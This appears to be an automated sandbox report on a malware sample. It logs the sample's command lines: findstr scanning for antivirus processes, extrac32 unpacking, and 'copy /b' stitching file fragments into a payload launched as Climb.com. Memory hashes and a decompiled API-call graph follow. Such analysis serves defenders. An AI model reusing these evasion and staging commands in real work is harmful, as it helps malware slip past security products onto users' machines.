                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:9
                                                                                                                                                                        Start time:03:56:38
                                                                                                                                                                        Start date:28/12/2024
                                                                                                                                                                        Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                                                                                                                                                        Imagebase:0x9a0000
                                                                                                                                                                        File size:29'696 bytes
                                                                                                                                                                        MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:10
                                                                                                                                                                        Start time:03:56:39
                                                                                                                                                                        Start date:28/12/2024
                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:cmd /c md 768400
                                                                                                                                                                        Imagebase:0x1f0000
                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:11
                                                                                                                                                                        Start time:03:56:40
                                                                                                                                                                        Start date:28/12/2024
                                                                                                                                                                        Path:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:extrac32 /Y /E Reflect
                                                                                                                                                                        Imagebase:0x8c0000
                                                                                                                                                                        File size:29'184 bytes
                                                                                                                                                                        MD5 hash:9472AAB6390E4F1431BAA912FCFF9707
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:12
                                                                                                                                                                        Start time:03:56:41
                                                                                                                                                                        Start date:28/12/2024
                                                                                                                                                                        Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:findstr /V "cocks" Articles
                                                                                                                                                                        Imagebase:0x9a0000
                                                                                                                                                                        File size:29'696 bytes
                                                                                                                                                                        MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:13
                                                                                                                                                                        Start time:03:56:41
                                                                                                                                                                        Start date:28/12/2024
                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:cmd /c copy /b ..\Maternity + ..\Beaches + ..\Rat + ..\Promise + ..\Zone + ..\Enrolled V
                                                                                                                                                                        Imagebase:0x1f0000
                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:14
                                                                                                                                                                        Start time:03:56:42
                                                                                                                                                                        Start date:28/12/2024
                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\768400\Climb.com
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:Climb.com V
                                                                                                                                                                        Imagebase:0xa60000
                                                                                                                                                                        File size:947'288 bytes
                                                                                                                                                                        MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                        • Detection: 0%, ReversingLabs
                                                                                                                                                                        Has exited:false

                                                                                                                                                                        Target ID:15
                                                                                                                                                                        Start time:03:56:42
                                                                                                                                                                        Start date:28/12/2024
                                                                                                                                                                        Path:C:\Windows\SysWOW64\choice.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:choice /d y /t 5
                                                                                                                                                                        Imagebase:0x90000
                                                                                                                                                                        File size:28'160 bytes
                                                                                                                                                                        MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Reset < >
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2387587166.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_59d0000_TNyOrM6mIM.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 45c3cc7d1ed56ba40ff869833792382ccf8e65f25d7a7a68004e2baad0d34e96
                                                                                                                                                                          • Instruction ID: 2d42b7111b1616b7755cc50fc50a3071f9ce02152f1cebf1e2f336bc40048cee
                                                                                                                                                                          • Opcode Fuzzy Hash: 45c3cc7d1ed56ba40ff869833792382ccf8e65f25d7a7a68004e2baad0d34e96
                                                                                                                                                                          • Instruction Fuzzy Hash: C751617090538ACFCB05DBB8E491A9EBBB3FF89314F109969C6046B341DB396A05CB91
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2387587166.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_59d0000_TNyOrM6mIM.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 071fbb2ed9cbf733752b5bd8518517a4d3b4fb5a920cdf0a38b5b26f2f199cc9
                                                                                                                                                                          • Instruction ID: 725b22cf65a84ca77e2e91943e3c258d0ea7176f8864ab856e424c3c9c413caa
                                                                                                                                                                          • Opcode Fuzzy Hash: 071fbb2ed9cbf733752b5bd8518517a4d3b4fb5a920cdf0a38b5b26f2f199cc9
                                                                                                                                                                          • Instruction Fuzzy Hash: E761A2357182019FCB14EB78D05DA29BBE6BB88310F55D429E50AD7391EF74EC41CBA1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2387587166.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_59d0000_TNyOrM6mIM.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: abdca584ced955f1a2a14aeabf3a74c12a7e50aed66faf63437fcf7ce8b18dd4
                                                                                                                                                                          • Instruction ID: 00e584e0343fd35b7c1945ec90a7d9ca96aa7670d4badb692530bae336b0ee22
                                                                                                                                                                          • Opcode Fuzzy Hash: abdca584ced955f1a2a14aeabf3a74c12a7e50aed66faf63437fcf7ce8b18dd4
                                                                                                                                                                          • Instruction Fuzzy Hash: D5416F7090528ACFCB05DFB8E491A9EBBF3FF88314F109969C6046B340DB396A45CB91
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2387587166.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_59d0000_TNyOrM6mIM.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 7f165e155ac27420567fa416a385481249a76992f91b34f7c248846851bef81d
                                                                                                                                                                          • Instruction ID: 2394ca64ec67e5a219d7e59ddaa72211bd49727ac371a3d87bc140d9c0e4f925
                                                                                                                                                                          • Opcode Fuzzy Hash: 7f165e155ac27420567fa416a385481249a76992f91b34f7c248846851bef81d
                                                                                                                                                                          • Instruction Fuzzy Hash: 213105757002158BCB00DBBAD988A6EFBE5FB88254F148526D90DD7341EB30E901CBE1

                                                                                                                                                                          Execution Graph

                                                                                                                                                                          Execution Coverage:17.7%
                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                          Signature Coverage:21%
                                                                                                                                                                          Total number of Nodes:1482
                                                                                                                                                                          Total number of Limit Nodes:25
                                                                                                                                                                          execution_graph 4186 402fc0 4187 401446 18 API calls 4186->4187 4188 402fc7 4187->4188 4189 401a13 4188->4189 4190 403017 4188->4190 4191 40300a 4188->4191 4193 406831 18 API calls 4190->4193 4192 401446 18 API calls 4191->4192 4192->4189 4193->4189 4194 4023c1 4195 40145c 18 API calls 4194->4195 4196 4023c8 4195->4196 4199 407296 4196->4199 4202 406efe CreateFileW 4199->4202 4203 406f30 4202->4203 4204 406f4a ReadFile 4202->4204 4205 4062cf 11 API calls 4203->4205 4206 4023d6 4204->4206 4209 406fb0 4204->4209 4205->4206 4207 406fc7 ReadFile lstrcpynA lstrcmpA 4207->4209 4210 40700e SetFilePointer ReadFile 4207->4210 4208 40720f CloseHandle 4208->4206 4209->4206 4209->4207 4209->4208 4211 407009 4209->4211 4210->4208 4212 4070d4 ReadFile 4210->4212 4211->4208 4213 407164 4212->4213 4213->4211 4213->4212 4214 40718b SetFilePointer GlobalAlloc ReadFile 4213->4214 4215 4071eb lstrcpynW GlobalFree 4214->4215 4216 4071cf 4214->4216 4215->4208 4216->4215 4216->4216 4217 401cc3 4218 40145c 18 API calls 4217->4218 4219 401cca lstrlenW 4218->4219 4220 4030dc 4219->4220 4221 4030e3 4220->4221 4223 405f7d wsprintfW 4220->4223 4223->4221 4224 401c46 4225 40145c 18 API calls 4224->4225 4226 401c4c 4225->4226 4227 4062cf 11 API calls 4226->4227 4228 401c59 4227->4228 4229 406cc7 81 API calls 4228->4229 4230 401c64 4229->4230 4231 403049 4232 401446 18 API calls 4231->4232 4233 403050 4232->4233 4234 406831 18 API calls 4233->4234 4235 401a13 4233->4235 4234->4235 4236 40204a 4237 401446 18 API calls 4236->4237 4238 402051 IsWindow 4237->4238 4239 4018d3 4238->4239 4240 40324c 4241 403277 4240->4241 4242 40325e SetTimer 4240->4242 4243 4032cc 4241->4243 4244 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4241->4244 4242->4241 4244->4243 4245 4022cc 4246 40145c 18 API calls 4245->4246 4247 4022d3 4246->4247 4248 406301 2 API calls 4247->4248 4249 4022d9 4248->4249 4251 4022e8 4249->4251 4254 405f7d wsprintfW 4249->4254 4252 4030e3 4251->4252 4255 405f7d wsprintfW 4251->4255 4254->4251 4255->4252 4256 4030cf 4257 40145c 18 API calls 4256->4257 4258 4030d6 4257->4258 4260 4030dc 4258->4260 4263 4063d8 GlobalAlloc lstrlenW 4258->4263 4261 4030e3 4260->4261 4290 405f7d wsprintfW 4260->4290 4264 406460 4263->4264 4265 40640e 4263->4265 4264->4260 4266 40643b GetVersionExW 4265->4266 4291 406057 CharUpperW 4265->4291 4266->4264 4267 40646a 4266->4267 4268 406490 LoadLibraryA 4267->4268 4269 406479 4267->4269 4268->4264 4272 4064ae GetProcAddress GetProcAddress GetProcAddress 4268->4272 4269->4264 4271 4065b1 GlobalFree 4269->4271 4273 4065c7 LoadLibraryA 4271->4273 4274 406709 FreeLibrary 4271->4274 4275 406621 4272->4275 4279 4064d6 4272->4279 4273->4264 4277 4065e1 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4273->4277 4274->4264 4276 40667d FreeLibrary 4275->4276 4278 406656 4275->4278 4276->4278 4277->4275 4282 406716 4278->4282 4287 4066b1 lstrcmpW 4278->4287 4288 4066e2 CloseHandle 4278->4288 4289 406700 CloseHandle 4278->4289 4279->4275 4280 406516 4279->4280 4281 4064fa FreeLibrary GlobalFree 4279->4281 4280->4271 4283 406528 lstrcpyW OpenProcess 4280->4283 4285 40657b CloseHandle CharUpperW lstrcmpW 4280->4285 4281->4264 4284 40671b CloseHandle FreeLibrary 4282->4284 4283->4280 4283->4285 4286 406730 CloseHandle 4284->4286 4285->4275 4285->4280 4286->4284 4287->4278 4287->4286 4288->4278 4289->4274 4290->4261 4291->4265 4292 4044d1 4293 40450b 4292->4293 4294 40453e 4292->4294 4360 405cb0 GetDlgItemTextW 4293->4360 4295 40454b GetDlgItem GetAsyncKeyState 4294->4295 4299 4045dd 4294->4299 4297 40456a GetDlgItem 4295->4297 4310 404588 4295->4310 4302 403d6b 19 API calls 4297->4302 4298 4046c9 4358 40485f 4298->4358 4362 405cb0 GetDlgItemTextW 4298->4362 4299->4298 4307 406831 18 API calls 4299->4307 4299->4358 4300 404516 4301 406064 5 API calls 4300->4301 4303 40451c 4301->4303 4305 40457d ShowWindow 4302->4305 4306 403ea0 5 API calls 4303->4306 4305->4310 4311 404521 GetDlgItem 4306->4311 4312 40465b SHBrowseForFolderW 4307->4312 4308 4046f5 4313 4067aa 18 API calls 4308->4313 4309 403df6 8 API calls 4314 404873 4309->4314 4315 4045a5 SetWindowTextW 4310->4315 4319 405d85 4 API calls 4310->4319 4316 40452f IsDlgButtonChecked 4311->4316 4311->4358 4312->4298 4318 404673 CoTaskMemFree 4312->4318 4323 4046fb 4313->4323 4317 403d6b 19 API calls 4315->4317 4316->4294 4321 4045c3 4317->4321 4322 40674e 3 API calls 4318->4322 4320 40459b 4319->4320 4320->4315 4327 40674e 3 API calls 4320->4327 4324 403d6b 19 API calls 4321->4324 4325 404680 4322->4325 4363 406035 lstrcpynW 4323->4363 4328 4045ce 4324->4328 4329 4046b7 SetDlgItemTextW 4325->4329 4334 406831 18 API calls 4325->4334 4327->4315 4361 403dc4 SendMessageW 4328->4361 4329->4298 4330 404712 4332 406328 3 API calls 4330->4332 4341 40471a 4332->4341 4333 4045d6 4335 406328 3 API calls 4333->4335 4336 40469f lstrcmpiW 4334->4336 4335->4299 4336->4329 4339 4046b0 lstrcatW 4336->4339 4337 40475c 4364 406035 lstrcpynW 4337->4364 4339->4329 4340 404765 4342 405d85 4 API calls 4340->4342 4341->4337 4345 40677d 2 API calls 4341->4345 4347 4047b1 4341->4347 4343 40476b GetDiskFreeSpaceW 4342->4343 4346 40478f MulDiv 4343->4346 4343->4347 4345->4341 4346->4347 4348 40480e 4347->4348 4365 4043d9 4347->4365 4349 404831 4348->4349 4351 40141d 80 API calls 4348->4351 4373 403db1 KiUserCallbackDispatcher 4349->4373 4351->4349 4352 4047ff 4354 404810 SetDlgItemTextW 4352->4354 4355 404804 4352->4355 4354->4348 4357 4043d9 21 API calls 4355->4357 4356 40484d 4356->4358 4374 403d8d 4356->4374 4357->4348 4358->4309 4360->4300 4361->4333 4362->4308 4363->4330 4364->4340 4366 4043f9 4365->4366 4367 406831 18 API calls 4366->4367 4368 404439 4367->4368 4369 406831 18 API calls 4368->4369 4370 404444 4369->4370 4371 406831 18 API calls 4370->4371 4372 404454 lstrlenW wsprintfW SetDlgItemTextW 4371->4372 4372->4352 4373->4356 4375 403da0 SendMessageW 4374->4375 4376 403d9b 4374->4376 4375->4358 4376->4375 4377 401dd3 4378 401446 18 API calls 4377->4378 4379 401dda 4378->4379 4380 401446 18 API calls 4379->4380 4381 4018d3 4380->4381 4382 402e55 4383 40145c 18 API calls 4382->4383 4384 402e63 4383->4384 4385 402e79 4384->4385 4386 40145c 18 API calls 4384->4386 4387 405e5c 2 API calls 4385->4387 4386->4385 4388 402e7f 4387->4388 4412 405e7c GetFileAttributesW CreateFileW 4388->4412 4390 402e8c 4391 402f35 4390->4391 4392 402e98 GlobalAlloc 4390->4392 4395 4062cf 11 API calls 4391->4395 4393 402eb1 4392->4393 4394 402f2c CloseHandle 4392->4394 4413 403368 SetFilePointer 4393->4413 4394->4391 4397 402f45 4395->4397 4399 402f50 DeleteFileW 4397->4399 4400 402f63 4397->4400 4398 402eb7 4401 403336 ReadFile 4398->4401 4399->4400 4414 401435 4400->4414 4403 402ec0 GlobalAlloc 4401->4403 4404 402ed0 4403->4404 4405 402f04 WriteFile GlobalFree 4403->4405 4407 40337f 33 API calls 4404->4407 4406 40337f 33 API calls 4405->4406 4408 402f29 4406->4408 4411 402edd 4407->4411 4408->4394 4410 402efb GlobalFree 4410->4405 4411->4410 4412->4390 4413->4398 4415 404f9e 25 API calls 4414->4415 4416 401443 4415->4416 4417 401cd5 4418 401446 18 API calls 4417->4418 4419 401cdd 4418->4419 4420 401446 18 API calls 4419->4420 4421 401ce8 4420->4421 4422 40145c 18 API calls 4421->4422 4423 401cf1 4422->4423 4424 401d07 lstrlenW 4423->4424 4425 401d43 4423->4425 4426 401d11 4424->4426 4426->4425 4430 406035 lstrcpynW 4426->4430 4428 401d2c 4428->4425 4429 401d39 lstrlenW 4428->4429 4429->4425 4430->4428 4431 402cd7 4432 401446 18 API calls 4431->4432 4434 402c64 4432->4434 4433 402d17 ReadFile 4433->4434 4434->4431 4434->4433 4435 402d99 4434->4435 4436 402dd8 4437 4030e3 4436->4437 4438 402ddf 4436->4438 4439 402de5 FindClose 4438->4439 4439->4437 4440 401d5c 4441 40145c 18 API calls 4440->4441 4442 401d63 4441->4442 4443 40145c 18 API calls 4442->4443 4444 401d6c 4443->4444 4445 401d73 lstrcmpiW 4444->4445 4446 401d86 lstrcmpW 4444->4446 4447 401d79 4445->4447 4446->4447 4448 401c99 4446->4448 4447->4446 4447->4448 4449 4027e3 4450 4027e9 4449->4450 4451 4027f2 4450->4451 4452 402836 4450->4452 4465 401553 4451->4465 4453 40145c 18 API calls 4452->4453 4455 40283d 4453->4455 4457 4062cf 11 API calls 4455->4457 4456 4027f9 4458 40145c 18 API calls 4456->4458 4462 401a13 4456->4462 4459 40284d 4457->4459 4460 40280a RegDeleteValueW 4458->4460 4469 40149d RegOpenKeyExW 4459->4469 4461 4062cf 11 API calls 4460->4461 4464 40282a RegCloseKey 4461->4464 4464->4462 4466 401563 4465->4466 4467 40145c 18 API calls 4466->4467 4468 401589 RegOpenKeyExW 4467->4468 4468->4456 4472 4014c9 4469->4472 4477 401515 4469->4477 4470 4014ef RegEnumKeyW 4471 401501 RegCloseKey 4470->4471 4470->4472 4474 406328 3 API calls 4471->4474 4472->4470 4472->4471 4473 401526 RegCloseKey 4472->4473 4475 40149d 3 API calls 4472->4475 4473->4477 4476 401511 4474->4476 4475->4472 4476->4477 4478 401541 RegDeleteKeyW 4476->4478 4477->4462 4478->4477 4479 4040e4 4480 4040ff 4479->4480 4486 40422d 4479->4486 4482 40413a 4480->4482 4510 403ff6 WideCharToMultiByte 4480->4510 4481 404298 4483 40436a 4481->4483 4484 4042a2 GetDlgItem 4481->4484 4490 403d6b 19 API calls 4482->4490 4491 403df6 8 API calls 4483->4491 4487 40432b 4484->4487 4488 4042bc 4484->4488 4486->4481 4486->4483 4489 404267 GetDlgItem SendMessageW 4486->4489 4487->4483 4492 40433d 4487->4492 4488->4487 4496 4042e2 6 API calls 4488->4496 4515 403db1 KiUserCallbackDispatcher 4489->4515 4494 40417a 4490->4494 4495 404365 4491->4495 4497 404353 4492->4497 4498 404343 SendMessageW 4492->4498 4500 403d6b 19 API calls 4494->4500 4496->4487 4497->4495 4501 404359 SendMessageW 4497->4501 4498->4497 4499 404293 4502 403d8d SendMessageW 4499->4502 4503 404187 CheckDlgButton 4500->4503 4501->4495 4502->4481 4513 403db1 KiUserCallbackDispatcher 4503->4513 4505 4041a5 GetDlgItem 4514 403dc4 SendMessageW 4505->4514 4507 4041bb SendMessageW 4508 4041e1 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4507->4508 4509 4041d8 GetSysColor 4507->4509 4508->4495 4509->4508 4511 404033 4510->4511 4512 404015 GlobalAlloc WideCharToMultiByte 4510->4512 4511->4482 4512->4511 4513->4505 4514->4507 4515->4499 4516 402ae4 4517 402aeb 4516->4517 4518 4030e3 4516->4518 4519 402af2 CloseHandle 4517->4519 4519->4518 4520 402065 4521 401446 18 API calls 4520->4521 4522 40206d 4521->4522 4523 401446 18 API calls 4522->4523 4524 402076 GetDlgItem 4523->4524 4525 4030dc 4524->4525 4526 4030e3 4525->4526 4528 405f7d wsprintfW 4525->4528 4528->4526 4529 402665 4530 40145c 18 API calls 4529->4530 4531 40266b 4530->4531 4532 40145c 18 API calls 4531->4532 4533 402674 4532->4533 4534 40145c 18 API calls 4533->4534 4535 40267d 4534->4535 4536 4062cf 11 API calls 4535->4536 4537 40268c 4536->4537 4538 406301 2 API calls 4537->4538 4539 402695 4538->4539 4540 4026a6 lstrlenW lstrlenW 4539->4540 4542 404f9e 25 API calls 4539->4542 4544 4030e3 4539->4544 4541 404f9e 25 API calls 4540->4541 4543 4026e8 SHFileOperationW 4541->4543 4542->4539 4543->4539 4543->4544 4545 401c69 4546 40145c 18 API calls 4545->4546 4547 401c70 4546->4547 4548 4062cf 11 API calls 4547->4548 4549 401c80 4548->4549 4550 405ccc MessageBoxIndirectW 4549->4550 4551 401a13 4550->4551 4552 402f6e 4553 402f72 4552->4553 4554 402fae 4552->4554 4556 4062cf 11 API calls 4553->4556 4555 40145c 18 API calls 4554->4555 4562 402f9d 4555->4562 4557 402f7d 4556->4557 4558 4062cf 11 API calls 4557->4558 4559 402f90 4558->4559 4560 402fa2 4559->4560 4561 402f98 4559->4561 4564 406113 9 API calls 4560->4564 4563 403ea0 5 API calls 4561->4563 4563->4562 4564->4562 4565 4023f0 4566 402403 4565->4566 4567 4024da 4565->4567 4568 40145c 18 API calls 4566->4568 4569 404f9e 25 API calls 4567->4569 4570 40240a 4568->4570 4573 4024f1 4569->4573 4571 40145c 18 API calls 4570->4571 4572 402413 4571->4572 4574 402429 LoadLibraryExW 4572->4574 4575 40241b GetModuleHandleW 4572->4575 4576 4024ce 4574->4576 4577 40243e 4574->4577 4575->4574 4575->4577 4579 404f9e 25 API calls 4576->4579 4589 406391 GlobalAlloc WideCharToMultiByte 4577->4589 4579->4567 4580 402449 4581 40248c 4580->4581 4582 40244f 4580->4582 4583 404f9e 25 API calls 4581->4583 4584 401435 25 API calls 4582->4584 4587 40245f 4582->4587 4585 402496 4583->4585 4584->4587 4586 4062cf 11 API calls 4585->4586 4586->4587 4587->4573 4588 4024c0 FreeLibrary 4587->4588 4588->4573 4590 4063c9 GlobalFree 4589->4590 4591 4063bc GetProcAddress 4589->4591 4590->4580 4591->4590 3431 402175 3432 401446 18 API calls 3431->3432 3433 40217c 3432->3433 3434 401446 18 API calls 3433->3434 3435 402186 3434->3435 3436 402197 3435->3436 3439 4062cf 11 API calls 3435->3439 3437 4021aa EnableWindow 3436->3437 3438 40219f ShowWindow 3436->3438 3440 4030e3 3437->3440 3438->3440 3439->3436 4592 4048f8 4593 404906 4592->4593 4594 40491d 4592->4594 4595 40490c 4593->4595 4610 404986 4593->4610 4596 40492b IsWindowVisible 4594->4596 4602 404942 4594->4602 4597 403ddb SendMessageW 4595->4597 4599 404938 4596->4599 4596->4610 4600 404916 4597->4600 4598 40498c CallWindowProcW 4598->4600 4611 40487a SendMessageW 4599->4611 4602->4598 4616 406035 lstrcpynW 4602->4616 4604 404971 4617 405f7d wsprintfW 4604->4617 4606 404978 4607 40141d 80 API calls 4606->4607 4608 40497f 4607->4608 4618 406035 lstrcpynW 4608->4618 4610->4598 4612 4048d7 SendMessageW 4611->4612 4613 40489d GetMessagePos ScreenToClient SendMessageW 4611->4613 4615 4048cf 4612->4615 4614 4048d4 4613->4614 4613->4615 4614->4612 4615->4602 4616->4604 4617->4606 4618->4610 3733 4050f9 3734 4052c1 3733->3734 3735 40511a GetDlgItem GetDlgItem GetDlgItem 3733->3735 3736 4052f2 3734->3736 3737 4052ca GetDlgItem CreateThread CloseHandle 3734->3737 3782 403dc4 SendMessageW 3735->3782 3739 405320 3736->3739 3741 405342 3736->3741 3742 40530c ShowWindow ShowWindow 3736->3742 3737->3736 3785 405073 OleInitialize 3737->3785 3743 40537e 3739->3743 3745 405331 3739->3745 3746 405357 ShowWindow 3739->3746 3740 40518e 3752 406831 18 API calls 3740->3752 3747 403df6 8 API calls 3741->3747 3784 403dc4 SendMessageW 3742->3784 3743->3741 3748 405389 SendMessageW 3743->3748 3749 403d44 SendMessageW 3745->3749 3750 405377 3746->3750 3751 405369 3746->3751 3757 4052ba 3747->3757 3756 4053a2 CreatePopupMenu 3748->3756 3748->3757 3749->3741 3755 403d44 SendMessageW 3750->3755 3753 404f9e 25 API calls 3751->3753 3754 4051ad 3752->3754 3753->3750 3758 4062cf 11 API calls 3754->3758 3755->3743 3759 406831 18 API calls 3756->3759 3760 4051b8 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3758->3760 3761 4053b2 AppendMenuW 3759->3761 3762 405203 SendMessageW SendMessageW 3760->3762 3763 40521f 3760->3763 3764 4053c5 GetWindowRect 3761->3764 3765 4053d8 3761->3765 3762->3763 3766 405232 3763->3766 3767 405224 SendMessageW 3763->3767 3768 4053df TrackPopupMenu 3764->3768 3765->3768 3769 403d6b 19 API calls 3766->3769 3767->3766 3768->3757 3770 4053fd 3768->3770 3771 405242 3769->3771 3772 405419 SendMessageW 3770->3772 3773 40524b ShowWindow 3771->3773 3774 40527f GetDlgItem SendMessageW 3771->3774 3772->3772 3775 405436 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3772->3775 3776 405261 ShowWindow 3773->3776 3777 40526e 3773->3777 3774->3757 3778 4052a2 SendMessageW SendMessageW 3774->3778 3779 40545b SendMessageW 3775->3779 3776->3777 3783 403dc4 SendMessageW 3777->3783 3778->3757 3779->3779 3780 405486 GlobalUnlock SetClipboardData CloseClipboard 3779->3780 3780->3757 3782->3740 3783->3774 3784->3739 3786 403ddb SendMessageW 3785->3786 3790 405096 3786->3790 3787 403ddb SendMessageW 3788 4050d1 OleUninitialize 3787->3788 3789 4062cf 11 API calls 3789->3790 3790->3789 3791 40139d 80 API calls 3790->3791 3792 4050c1 3790->3792 3791->3790 3792->3787 4619 4020f9 GetDC GetDeviceCaps 4620 401446 18 API calls 4619->4620 4621 402116 MulDiv 4620->4621 4622 401446 18 API calls 4621->4622 4623 40212c 4622->4623 4624 406831 18 API calls 4623->4624 4625 402165 CreateFontIndirectW 4624->4625 4626 4030dc 4625->4626 4627 4030e3 4626->4627 4629 405f7d wsprintfW 4626->4629 4629->4627 4630 4024fb 4631 40145c 18 API calls 4630->4631 4632 402502 4631->4632 4633 40145c 18 API calls 4632->4633 4634 40250c 4633->4634 4635 40145c 18 API calls 4634->4635 4636 402515 4635->4636 4637 40145c 18 API calls 4636->4637 4638 40251f 4637->4638 4639 40145c 18 API calls 4638->4639 4640 402529 4639->4640 4641 40253d 4640->4641 4642 40145c 18 API calls 4640->4642 4643 4062cf 11 API calls 4641->4643 4642->4641 4644 40256a CoCreateInstance 4643->4644 4645 40258c 4644->4645 4646 4026fc 4648 402708 4646->4648 4649 401ee4 4646->4649 4647 406831 18 API calls 4647->4649 4649->4646 4649->4647 3793 4019fd 3794 40145c 18 API calls 3793->3794 3795 401a04 3794->3795 3798 405eab 3795->3798 3799 405eb8 GetTickCount GetTempFileNameW 3798->3799 3800 401a0b 3799->3800 3801 405eee 3799->3801 3801->3799 3801->3800 4650 4022fd 4651 40145c 18 API calls 4650->4651 4652 402304 GetFileVersionInfoSizeW 4651->4652 4653 4030e3 4652->4653 4654 40232b GlobalAlloc 4652->4654 4654->4653 4655 40233f GetFileVersionInfoW 4654->4655 4656 402350 VerQueryValueW 4655->4656 4657 402381 GlobalFree 4655->4657 4656->4657 4658 402369 4656->4658 4657->4653 4663 405f7d wsprintfW 4658->4663 4661 402375 4664 405f7d wsprintfW 4661->4664 4663->4661 4664->4657 4665 402afd 4666 40145c 18 API calls 4665->4666 4667 402b04 4666->4667 4672 405e7c GetFileAttributesW CreateFileW 4667->4672 4669 402b10 4670 4030e3 4669->4670 4673 405f7d wsprintfW 4669->4673 4672->4669 4673->4670 4674 4029ff 4675 401553 19 API calls 4674->4675 4676 402a09 4675->4676 4677 40145c 18 API calls 4676->4677 4678 402a12 4677->4678 4679 402a1f RegQueryValueExW 4678->4679 4683 401a13 4678->4683 4680 402a45 4679->4680 4681 402a3f 4679->4681 4682 4029e4 RegCloseKey 4680->4682 4680->4683 4681->4680 4685 405f7d wsprintfW 4681->4685 4682->4683 4685->4680 4686 401000 4687 401037 BeginPaint GetClientRect 4686->4687 4688 40100c DefWindowProcW 4686->4688 4690 4010fc 4687->4690 4691 401182 4688->4691 4692 401073 CreateBrushIndirect FillRect DeleteObject 4690->4692 4693 401105 4690->4693 4692->4690 4694 401170 EndPaint 4693->4694 4695 40110b CreateFontIndirectW 4693->4695 4694->4691 4695->4694 4696 40111b 6 API calls 4695->4696 4696->4694 4697 401f80 4698 401446 18 API calls 4697->4698 4699 401f88 4698->4699 4700 401446 18 API calls 4699->4700 4701 401f93 4700->4701 